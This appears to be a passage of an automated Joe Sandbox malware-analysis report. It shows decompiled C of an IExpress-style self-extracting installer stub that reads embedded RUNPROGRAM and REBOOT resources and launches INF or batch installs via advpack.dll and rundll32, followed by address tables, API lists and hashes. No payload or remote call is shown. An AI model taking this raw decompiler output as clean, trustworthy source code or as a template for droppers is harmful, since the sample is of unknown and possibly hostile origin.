                                                                      											_t129 = E011D6495(_t127, _t132, _t157, __eflags);
                                                                      											__eflags = _t129;
                                                                      											if(_t129 == 0) {
                                                                      												_t146 = 0x4c8;
                                                                      												E011D44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                      												L65:
                                                                      												LocalFree(_v408);
                                                                      												 *0x11d9124 = E011D6285();
                                                                      												goto L62;
                                                                      											}
                                                                      											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                      											_v404 = _t146;
                                                                      											__eflags = _t146;
                                                                      											if(_t146 == 0) {
                                                                      												_t146 = 0x4c9;
                                                                      												__eflags = 0;
                                                                      												E011D44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                      												FreeLibrary(_t129);
                                                                      												goto L65;
                                                                      											}
                                                                      											__eflags =  *0x11d8a30;
                                                                      											_t151 = _v408;
                                                                      											_v384 = 0;
                                                                      											_v368 =  &_v280;
                                                                      											_t96 =  *0x11d9a40; // 0x3
                                                                      											_v364 = _t96;
                                                                      											_t97 =  *0x11d8a38 & 0x0000ffff;
                                                                      											_v380 = 0x11d9154;
                                                                      											_v376 = _t151;
                                                                      											_v372 = 0x11d91e4;
                                                                      											_v360 = _t97;
                                                                      											if( *0x11d8a30 != 0) {
                                                                      												_t97 = _t97 | 0x00010000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											_t144 =  *0x11d9a34; // 0x1
                                                                      											__eflags = _t144 & 0x00000008;
                                                                      											if((_t144 & 0x00000008) != 0) {
                                                                      												_t97 = _t97 | 0x00020000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											__eflags = _t144 & 0x00000010;
                                                                      											if((_t144 & 0x00000010) != 0) {
                                                                      												_t97 = _t97 | 0x00040000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											_t145 =  *0x11d8d48; // 0x0
                                                                      											__eflags = _t145 & 0x00000040;
                                                                      											if((_t145 & 0x00000040) != 0) {
                                                                      												_t97 = _t97 | 0x00080000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											__eflags = _t145;
                                                                      											if(_t145 < 0) {
                                                                      												_t104 = _t97 | 0x00100000;
                                                                      												__eflags = _t104;
                                                                      												_v360 = _t104;
                                                                      											}
                                                                      											_t98 =  *0x11d9a38; // 0x0
                                                                      											_v356 = _t98;
                                                                      											_t130 = _t146;
                                                                      											 *0x11da288( &_v384);
                                                                      											_t101 = _v404();
                                                                      											__eflags = _t164 - _t164;
                                                                      											if(_t164 != _t164) {
                                                                      												_t130 = 4;
                                                                      												asm("int 0x29");
                                                                      											}
                                                                      											 *0x11d9124 = _t101;
                                                                      											_push(_t129);
                                                                      											__eflags = _t101;
                                                                      											if(_t101 < 0) {
                                                                      												FreeLibrary();
                                                                      												goto L61;
                                                                      											} else {
                                                                      												FreeLibrary();
                                                                      												_t127 = _v400;
                                                                      												goto L58;
                                                                      											}
                                                                      										}
                                                                      										__eflags =  *0x11d9a40 - 1; // 0x3
                                                                      										if(__eflags == 0) {
                                                                      											goto L37;
                                                                      										}
                                                                      										__eflags =  *0x11d8a20;
                                                                      										if( *0x11d8a20 == 0) {
                                                                      											goto L37;
                                                                      										}
                                                                      										__eflags = _t157;
                                                                      										if(_t157 != 0) {
                                                                      											goto L38;
                                                                      										}
                                                                      										_v388 = 1;
                                                                      										E011D202A(_t146); // executed
                                                                      										goto L37;
                                                                      									}
                                                                      									_t146 =  &_v280;
                                                                      									_t108 = E011D468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                      									__eflags = _t108;
                                                                      									if(_t108 == 0) {
                                                                      										goto L25;
                                                                      									}
                                                                      									__eflags =  *0x11d8c42;
                                                                      									if( *0x11d8c42 != 0) {
                                                                      										goto L69;
                                                                      									}
                                                                      									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                      									__eflags = _t112 == 0;
                                                                      									if(_t112 == 0) {
                                                                      										goto L69;
                                                                      									}
                                                                      									goto L31;
                                                                      								}
                                                                      								_t118 =  *0x11d8a38; // 0x0
                                                                      								if(_t118 == 0) {
                                                                      									L23:
                                                                      									if(_t153 != 0) {
                                                                      										goto L31;
                                                                      									}
                                                                      									_t146 =  &_v276;
                                                                      									if(E011D468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                      										goto L27;
                                                                      									}
                                                                      									goto L25;
                                                                      								}
                                                                      								if((_t118 & 0x00000001) == 0) {
                                                                      									__eflags = _t118 & 0x00000002;
                                                                      									if((_t118 & 0x00000002) == 0) {
                                                                      										goto L62;
                                                                      									}
                                                                      									_t140 = "USRQCMD";
                                                                      									L20:
                                                                      									_t146 =  &_v276;
                                                                      									if(E011D468F(_t140,  &_v276, 0x104) == 0) {
                                                                      										goto L25;
                                                                      									}
                                                                      									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                      										_t153 = 1;
                                                                      										_v388 = 1;
                                                                      									}
                                                                      									goto L23;
                                                                      								}
                                                                      								_t140 = "ADMQCMD";
                                                                      								goto L20;
                                                                      							}
                                                                      						}
                                                                      						L26:
                                                                      						_push(_t130);
                                                                      						_t146 = 0x104;
                                                                      						E011D1781( &_v276, 0x104, _t130, 0x11d8c42);
                                                                      						goto L27;
                                                                      					}
                                                                      				}
                                                                      				_t130 = "REBOOT";
                                                                      				_t125 = E011D468F(_t130, 0x11d9a2c, 4);
                                                                      				if(_t125 == 0 || _t125 > 4) {
                                                                      					goto L25;
                                                                      				} else {
                                                                      					goto L3;
                                                                      				}
                                                                      			}





























































                                                                      0x011d3baa
                                                                      0x011d3bb0
                                                                      0x011d3bb7
                                                                      0x011d3bc0
                                                                      0x011d3bc2
                                                                      0x011d3bc9
                                                                      0x011d3bcb
                                                                      0x011d3bcf
                                                                      0x011d3bd3
                                                                      0x011d3bd9
                                                                      0x011d3bfd
                                                                      0x011d3bfd
                                                                      0x011d3bff
                                                                      0x011d3c03
                                                                      0x011d3c03
                                                                      0x011d3c11
                                                                      0x011d3c16
                                                                      0x011d3c19
                                                                      0x011d3c28
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3c30
                                                                      0x011d3c39
                                                                      0x011d3c40
                                                                      0x011d3d13
                                                                      0x011d3d15
                                                                      0x011d3d21
                                                                      0x011d3d26
                                                                      0x00000000
                                                                      0x011d3c4f
                                                                      0x011d3c56
                                                                      0x011d3c60
                                                                      0x011d3c65
                                                                      0x011d3c77
                                                                      0x011d3c78
                                                                      0x011d3c7c
                                                                      0x011d3c7e
                                                                      0x011d3c82
                                                                      0x011d3c82
                                                                      0x00000000
                                                                      0x011d3c7c
                                                                      0x011d3c67
                                                                      0x011d3c69
                                                                      0x011d3c6d
                                                                      0x00000000
                                                                      0x011d3c58
                                                                      0x011d3c58
                                                                      0x011d3c6e
                                                                      0x011d3c6e
                                                                      0x011d3c87
                                                                      0x011d3c89
                                                                      0x011d3d4d
                                                                      0x011d3d4f
                                                                      0x011d3d50
                                                                      0x011d3d52
                                                                      0x011d3d9e
                                                                      0x011d3da8
                                                                      0x011d3daf
                                                                      0x011d3db4
                                                                      0x011d3db6
                                                                      0x011d3f4d
                                                                      0x011d3f4d
                                                                      0x011d3f4f
                                                                      0x011d3f56
                                                                      0x011d3f57
                                                                      0x011d3f58
                                                                      0x011d3f63
                                                                      0x011d3f63
                                                                      0x011d3dbc
                                                                      0x011d3dc0
                                                                      0x011d3dc2
                                                                      0x011d3de6
                                                                      0x011d3de6
                                                                      0x011d3de8
                                                                      0x011d3f0b
                                                                      0x011d3f0b
                                                                      0x011d3f0f
                                                                      0x011d3f13
                                                                      0x011d3f15
                                                                      0x011d3f1a
                                                                      0x011d3f1c
                                                                      0x011d3f46
                                                                      0x011d3f47
                                                                      0x00000000
                                                                      0x011d3f47
                                                                      0x011d3f1e
                                                                      0x011d3f1f
                                                                      0x011d3f25
                                                                      0x011d3f26
                                                                      0x011d3f2a
                                                                      0x011d3f2d
                                                                      0x011d3fd9
                                                                      0x011d3fd9
                                                                      0x011d3fda
                                                                      0x011d3fda
                                                                      0x011d3fe1
                                                                      0x011d3fe3
                                                                      0x011d3fe3
                                                                      0x011d3fe8
                                                                      0x00000000
                                                                      0x011d3fe8
                                                                      0x011d3f33
                                                                      0x011d3f37
                                                                      0x00000000
                                                                      0x011d3f37
                                                                      0x011d3dee
                                                                      0x011d3dee
                                                                      0x011d3df5
                                                                      0x011d3fad
                                                                      0x011d3fb9
                                                                      0x011d3fc2
                                                                      0x011d3fc8
                                                                      0x00000000
                                                                      0x011d3fc8
                                                                      0x011d3dfb
                                                                      0x011d3dfd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3e03
                                                                      0x011d3e0a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3e15
                                                                      0x011d3e17
                                                                      0x011d3e19
                                                                      0x011d3f94
                                                                      0x011d3fa4
                                                                      0x011d3f7c
                                                                      0x011d3f80
                                                                      0x011d3f8b
                                                                      0x00000000
                                                                      0x011d3f8b
                                                                      0x011d3e2c
                                                                      0x011d3e30
                                                                      0x011d3e34
                                                                      0x011d3e36
                                                                      0x011d3f69
                                                                      0x011d3f6e
                                                                      0x011d3f70
                                                                      0x011d3f76
                                                                      0x00000000
                                                                      0x011d3f76
                                                                      0x011d3e3c
                                                                      0x011d3e43
                                                                      0x011d3e47
                                                                      0x011d3e52
                                                                      0x011d3e56
                                                                      0x011d3e5c
                                                                      0x011d3e61
                                                                      0x011d3e68
                                                                      0x011d3e70
                                                                      0x011d3e74
                                                                      0x011d3e7c
                                                                      0x011d3e80
                                                                      0x011d3e82
                                                                      0x011d3e82
                                                                      0x011d3e87
                                                                      0x011d3e87
                                                                      0x011d3e8b
                                                                      0x011d3e91
                                                                      0x011d3e94
                                                                      0x011d3e96
                                                                      0x011d3e96
                                                                      0x011d3e9b
                                                                      0x011d3e9b
                                                                      0x011d3e9f
                                                                      0x011d3ea2
                                                                      0x011d3ea4
                                                                      0x011d3ea4
                                                                      0x011d3ea9
                                                                      0x011d3ea9
                                                                      0x011d3ead
                                                                      0x011d3eb3
                                                                      0x011d3eb6
                                                                      0x011d3eb8
                                                                      0x011d3eb8
                                                                      0x011d3ebd
                                                                      0x011d3ebd
                                                                      0x011d3ec1
                                                                      0x011d3ec3
                                                                      0x011d3ec5
                                                                      0x011d3ec5
                                                                      0x011d3eca
                                                                      0x011d3eca
                                                                      0x011d3ece
                                                                      0x011d3ed5
                                                                      0x011d3ed9
                                                                      0x011d3ee0
                                                                      0x011d3ee6
                                                                      0x011d3eea
                                                                      0x011d3eec
                                                                      0x011d3eee
                                                                      0x011d3ef3
                                                                      0x011d3ef3
                                                                      0x011d3ef5
                                                                      0x011d3efa
                                                                      0x011d3efb
                                                                      0x011d3efd
                                                                      0x011d3f40
                                                                      0x00000000
                                                                      0x011d3eff
                                                                      0x011d3eff
                                                                      0x011d3f05
                                                                      0x00000000
                                                                      0x011d3f05
                                                                      0x011d3efd
                                                                      0x011d3dc7
                                                                      0x011d3dce
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3dd0
                                                                      0x011d3dd7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3dd9
                                                                      0x011d3ddb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3ddd
                                                                      0x011d3de1
                                                                      0x00000000
                                                                      0x011d3de1
                                                                      0x011d3d59
                                                                      0x011d3d65
                                                                      0x011d3d6a
                                                                      0x011d3d6c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3d6e
                                                                      0x011d3d75
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3d8f
                                                                      0x011d3d96
                                                                      0x011d3d98
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3d98
                                                                      0x011d3c8f
                                                                      0x011d3c98
                                                                      0x011d3cf1
                                                                      0x011d3cf3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3cfe
                                                                      0x011d3d11
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3d11
                                                                      0x011d3c9c
                                                                      0x011d3ca5
                                                                      0x011d3ca7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3cad
                                                                      0x011d3cb2
                                                                      0x011d3cb7
                                                                      0x011d3cc5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3ce8
                                                                      0x011d3cec
                                                                      0x011d3ced
                                                                      0x011d3ced
                                                                      0x00000000
                                                                      0x011d3ce8
                                                                      0x011d3c9e
                                                                      0x00000000
                                                                      0x011d3c9e
                                                                      0x011d3c56
                                                                      0x011d3d35
                                                                      0x011d3d35
                                                                      0x011d3d3c
                                                                      0x011d3d48
                                                                      0x00000000
                                                                      0x011d3d48
                                                                      0x011d3c03
                                                                      0x011d3be2
                                                                      0x011d3be7
                                                                      0x011d3bee
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      • memset.MSVCRT ref: 011D3C11
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 011D3CDC
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                        • Part of subcall function 011D468F: SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                        • Part of subcall function 011D468F: LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                        • Part of subcall function 011D468F: LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                        • Part of subcall function 011D468F: memcpy_s.MSVCRT ref: 011D46E5
                                                                        • Part of subcall function 011D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,011D8C42), ref: 011D3D8F
                                                                      • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 011D3E26
                                                                      • FreeLibrary.KERNEL32(00000000,?,011D8C42), ref: 011D3EFF
                                                                      • LocalFree.KERNEL32(?,?,?,?,011D8C42), ref: 011D3F1F
                                                                      • FreeLibrary.KERNEL32(00000000,?,011D8C42), ref: 011D3F40
                                                                      • LocalFree.KERNEL32(?,?,?,?,011D8C42), ref: 011D3F47
                                                                      • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,011D8C42), ref: 011D3F76
                                                                      • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,011D8C42), ref: 011D3F80
                                                                      • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,011D8C42), ref: 011D3FC2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                      • API String ID: 1032054927-778137101
                                                                      • Opcode ID: 9230d9b1a49aa0ef721702c440a93c90dc536577e873a8cde1d2f0407d8a0681
                                                                      • Instruction ID: fd48b626a44dbe0f5721d3cbcdf0e0b9a149b0f2d4c61d42f1497bc329e0ff81
                                                                      • Opcode Fuzzy Hash: 9230d9b1a49aa0ef721702c440a93c90dc536577e873a8cde1d2f0407d8a0681
                                                                      • Instruction Fuzzy Hash: C1B1D1B162A3159BE73CDF689844B6B7BE4FB84714F100A2DFAB5D6180D7748884CB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 141 11d1ae8-11d1b2c call 11d1680 144 11d1b2e-11d1b39 141->144 145 11d1b3b-11d1b40 141->145 146 11d1b46-11d1b61 call 11d1a84 144->146 145->146 149 11d1b9f-11d1bc2 call 11d1781 call 11d658a 146->149 150 11d1b63-11d1b65 146->150 157 11d1bc7-11d1bd3 call 11d66c8 149->157 152 11d1b68-11d1b6d 150->152 152->152 154 11d1b6f-11d1b74 152->154 154->149 156 11d1b76-11d1b7b 154->156 158 11d1b7d-11d1b81 156->158 159 11d1b83-11d1b86 156->159 165 11d1bd9-11d1bf1 CompareStringA 157->165 166 11d1d73-11d1d7f call 11d66c8 157->166 158->159 161 11d1b8c-11d1b9d call 11d1680 158->161 159->149 162 11d1b88-11d1b8a 159->162 161->157 162->149 162->161 165->166 168 11d1bf7-11d1c07 GetFileAttributesA 165->168 175 11d1df8-11d1e09 LocalAlloc 166->175 176 11d1d81-11d1d99 CompareStringA 166->176 170 11d1c0d-11d1c15 168->170 171 11d1d53-11d1d5e 168->171 170->171 174 11d1c1b-11d1c33 call 11d1a84 170->174 173 11d1d64-11d1d6e call 11d44b9 171->173 188 11d1e94-11d1ea4 call 11d6ce0 173->188 190 11d1c35-11d1c38 174->190 191 11d1c50-11d1c61 LocalAlloc 174->191 178 11d1e0b-11d1e1b GetFileAttributesA 175->178 179 11d1dd4-11d1ddf 175->179 176->175 181 11d1d9b-11d1da2 176->181 183 11d1e1d-11d1e1f 178->183 184 11d1e67-11d1e73 call 11d1680 178->184 179->173 186 11d1da5-11d1daa 181->186 183->184 189 11d1e21-11d1e3e call 11d1781 183->189 194 11d1e78-11d1e84 call 11d2aac 184->194 186->186 192 11d1dac-11d1db4 186->192 189->194 211 11d1e40-11d1e43 189->211 197 11d1c3a 190->197 198 11d1c40-11d1c4b call 11d1a84 190->198 191->179 193 11d1c67-11d1c72 191->193 199 11d1db7-11d1dbc 192->199 200 11d1c79-11d1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 193->200 201 11d1c74 193->201 210 11d1e89-11d1e92 194->210 197->198 198->191 199->199 206 11d1dbe-11d1dd2 LocalAlloc 199->206 208 11d1cf8-11d1d07 200->208 209 11d1cc2-11d1ccc 200->209 201->200 206->179 207 11d1de1-11d1df3 call 11d171e 206->207 207->210 216 11d1d09-11d1d21 GetShortPathNameA 208->216 217 11d1d23 208->217 213 11d1cce 209->213 214 11d1cd3-11d1cf3 call 11d1680 * 2 209->214 210->188 211->194 215 11d1e45-11d1e65 call 11d16b3 * 2 211->215 213->214 214->210 215->194 221 11d1d28-11d1d2b 216->221 217->221 224 11d1d2d 221->224 225 11d1d32-11d1d4e call 11d171e 221->225 224->225 225->210
                                                                      C-Code - Quality: 82%
                                                                      			E011D1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v527;
                                                                      				char _v528;
                                                                      				char _v1552;
                                                                      				CHAR* _v1556;
                                                                      				int* _v1560;
                                                                      				CHAR** _v1564;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t48;
                                                                      				CHAR* _t53;
                                                                      				CHAR* _t54;
                                                                      				char* _t57;
                                                                      				char* _t58;
                                                                      				CHAR* _t60;
                                                                      				void* _t62;
                                                                      				signed char _t65;
                                                                      				intOrPtr _t76;
                                                                      				intOrPtr _t77;
                                                                      				unsigned int _t85;
                                                                      				CHAR* _t90;
                                                                      				CHAR* _t92;
                                                                      				char _t105;
                                                                      				char _t106;
                                                                      				CHAR** _t111;
                                                                      				CHAR* _t115;
                                                                      				intOrPtr* _t125;
                                                                      				void* _t126;
                                                                      				CHAR* _t132;
                                                                      				CHAR* _t135;
                                                                      				void* _t138;
                                                                      				void* _t139;
                                                                      				void* _t145;
                                                                      				intOrPtr* _t146;
                                                                      				char* _t148;
                                                                      				CHAR* _t151;
                                                                      				void* _t152;
                                                                      				CHAR* _t155;
                                                                      				CHAR* _t156;
                                                                      				void* _t157;
                                                                      				signed int _t158;
                                                                      
                                                                      				_t48 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t48 ^ _t158;
                                                                      				_t108 = __ecx;
                                                                      				_v1564 = _a4;
                                                                      				_v1560 = _a8;
                                                                      				E011D1680( &_v528, 0x104, __ecx);
                                                                      				if(_v528 != 0x22) {
                                                                      					_t135 = " ";
                                                                      					_t53 =  &_v528;
                                                                      				} else {
                                                                      					_t135 = "\"";
                                                                      					_t53 =  &_v527;
                                                                      				}
                                                                      				_t111 =  &_v1556;
                                                                      				_v1556 = _t53;
                                                                      				_t54 = E011D1A84(_t111, _t135);
                                                                      				_t156 = _v1556;
                                                                      				_t151 = _t54;
                                                                      				if(_t156 == 0) {
                                                                      					L12:
                                                                      					_push(_t111);
                                                                      					E011D1781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                      					E011D658A( &_v268, 0x104, _t156);
                                                                      					goto L13;
                                                                      				} else {
                                                                      					_t132 = _t156;
                                                                      					_t148 =  &(_t132[1]);
                                                                      					do {
                                                                      						_t105 =  *_t132;
                                                                      						_t132 =  &(_t132[1]);
                                                                      					} while (_t105 != 0);
                                                                      					_t111 = _t132 - _t148;
                                                                      					if(_t111 < 3) {
                                                                      						goto L12;
                                                                      					}
                                                                      					_t106 = _t156[1];
                                                                      					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                      						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                      							goto L12;
                                                                      						} else {
                                                                      							goto L11;
                                                                      						}
                                                                      					} else {
                                                                      						L11:
                                                                      						E011D1680( &_v268, 0x104, _t156);
                                                                      						L13:
                                                                      						_t138 = 0x2e;
                                                                      						_t57 = E011D66C8(_t156, _t138);
                                                                      						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                      							_t139 = 0x2e;
                                                                      							_t115 = _t156;
                                                                      							_t58 = E011D66C8(_t115, _t139);
                                                                      							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                      								_t156 = LocalAlloc(0x40, 0x400);
                                                                      								if(_t156 == 0) {
                                                                      									goto L43;
                                                                      								}
                                                                      								_t65 = GetFileAttributesA( &_v268); // executed
                                                                      								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                      									E011D1680( &_v1552, 0x400, _t108);
                                                                      								} else {
                                                                      									_push(_t115);
                                                                      									_t108 = 0x400;
                                                                      									E011D1781( &_v1552, 0x400, _t115,  &_v268);
                                                                      									if(_t151 != 0 &&  *_t151 != 0) {
                                                                      										E011D16B3( &_v1552, 0x400, " ");
                                                                      										E011D16B3( &_v1552, 0x400, _t151);
                                                                      									}
                                                                      								}
                                                                      								_t140 = _t156;
                                                                      								 *_t156 = 0;
                                                                      								E011D2AAC( &_v1552, _t156, _t156);
                                                                      								goto L53;
                                                                      							} else {
                                                                      								_t108 = "Command.com /c %s";
                                                                      								_t125 = "Command.com /c %s";
                                                                      								_t145 = _t125 + 1;
                                                                      								do {
                                                                      									_t76 =  *_t125;
                                                                      									_t125 = _t125 + 1;
                                                                      								} while (_t76 != 0);
                                                                      								_t126 = _t125 - _t145;
                                                                      								_t146 =  &_v268;
                                                                      								_t157 = _t146 + 1;
                                                                      								do {
                                                                      									_t77 =  *_t146;
                                                                      									_t146 = _t146 + 1;
                                                                      								} while (_t77 != 0);
                                                                      								_t140 = _t146 - _t157;
                                                                      								_t154 = _t126 + 8 + _t146 - _t157;
                                                                      								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                      								if(_t156 != 0) {
                                                                      									E011D171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                      									goto L53;
                                                                      								}
                                                                      								goto L43;
                                                                      							}
                                                                      						} else {
                                                                      							_t85 = GetFileAttributesA( &_v268);
                                                                      							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                      								_t140 = 0x525;
                                                                      								_push(0);
                                                                      								_push(0x10);
                                                                      								_push(0);
                                                                      								_t60 =  &_v268;
                                                                      								goto L35;
                                                                      							} else {
                                                                      								_t140 = "[";
                                                                      								_v1556 = _t151;
                                                                      								_t90 = E011D1A84( &_v1556, "[");
                                                                      								if(_t90 != 0) {
                                                                      									if( *_t90 != 0) {
                                                                      										_v1556 = _t90;
                                                                      									}
                                                                      									_t140 = "]";
                                                                      									E011D1A84( &_v1556, "]");
                                                                      								}
                                                                      								_t156 = LocalAlloc(0x40, 0x200);
                                                                      								if(_t156 == 0) {
                                                                      									L43:
                                                                      									_t60 = 0;
                                                                      									_t140 = 0x4b5;
                                                                      									_push(0);
                                                                      									_push(0x10);
                                                                      									_push(0);
                                                                      									L35:
                                                                      									_push(_t60);
                                                                      									E011D44B9(0, _t140);
                                                                      									_t62 = 0;
                                                                      									goto L54;
                                                                      								} else {
                                                                      									_t155 = _v1556;
                                                                      									_t92 = _t155;
                                                                      									if( *_t155 == 0) {
                                                                      										_t92 = "DefaultInstall";
                                                                      									}
                                                                      									 *0x11d9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                      									 *_v1560 = 1;
                                                                      									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x11d1140, _t156, 8,  &_v268) == 0) {
                                                                      										 *0x11d9a34 =  *0x11d9a34 & 0xfffffffb;
                                                                      										if( *0x11d9a40 != 0) {
                                                                      											_t108 = "setupapi.dll";
                                                                      										} else {
                                                                      											_t108 = "setupx.dll";
                                                                      											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                      										}
                                                                      										if( *_t155 == 0) {
                                                                      											_t155 = "DefaultInstall";
                                                                      										}
                                                                      										_push( &_v268);
                                                                      										_push(_t155);
                                                                      										E011D171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                      									} else {
                                                                      										 *0x11d9a34 =  *0x11d9a34 | 0x00000004;
                                                                      										if( *_t155 == 0) {
                                                                      											_t155 = "DefaultInstall";
                                                                      										}
                                                                      										E011D1680(_t108, 0x104, _t155);
                                                                      										_t140 = 0x200;
                                                                      										E011D1680(_t156, 0x200,  &_v268);
                                                                      									}
                                                                      									L53:
                                                                      									_t62 = 1;
                                                                      									 *_v1564 = _t156;
                                                                      									L54:
                                                                      									_pop(_t152);
                                                                      									return E011D6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      			}














































                                                                      0x011d1af3
                                                                      0x011d1afa
                                                                      0x011d1b07
                                                                      0x011d1b09
                                                                      0x011d1b1a
                                                                      0x011d1b20
                                                                      0x011d1b2c
                                                                      0x011d1b3b
                                                                      0x011d1b40
                                                                      0x011d1b2e
                                                                      0x011d1b2e
                                                                      0x011d1b33
                                                                      0x011d1b33
                                                                      0x011d1b46
                                                                      0x011d1b4c
                                                                      0x011d1b52
                                                                      0x011d1b57
                                                                      0x011d1b5d
                                                                      0x011d1b61
                                                                      0x011d1b9f
                                                                      0x011d1b9f
                                                                      0x011d1bb1
                                                                      0x011d1bc2
                                                                      0x00000000
                                                                      0x011d1b63
                                                                      0x011d1b63
                                                                      0x011d1b65
                                                                      0x011d1b68
                                                                      0x011d1b68
                                                                      0x011d1b6a
                                                                      0x011d1b6b
                                                                      0x011d1b6f
                                                                      0x011d1b74
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d1b76
                                                                      0x011d1b7b
                                                                      0x011d1b86
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d1b8c
                                                                      0x011d1b8c
                                                                      0x011d1b98
                                                                      0x011d1bc7
                                                                      0x011d1bc9
                                                                      0x011d1bcc
                                                                      0x011d1bd3
                                                                      0x011d1d75
                                                                      0x011d1d76
                                                                      0x011d1d78
                                                                      0x011d1d7f
                                                                      0x011d1e05
                                                                      0x011d1e09
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d1e12
                                                                      0x011d1e1b
                                                                      0x011d1e73
                                                                      0x011d1e21
                                                                      0x011d1e21
                                                                      0x011d1e28
                                                                      0x011d1e37
                                                                      0x011d1e3e
                                                                      0x011d1e52
                                                                      0x011d1e60
                                                                      0x011d1e60
                                                                      0x011d1e3e
                                                                      0x011d1e79
                                                                      0x011d1e7b
                                                                      0x011d1e84
                                                                      0x00000000
                                                                      0x011d1d9b
                                                                      0x011d1d9b
                                                                      0x011d1da0
                                                                      0x011d1da2
                                                                      0x011d1da5
                                                                      0x011d1da5
                                                                      0x011d1da7
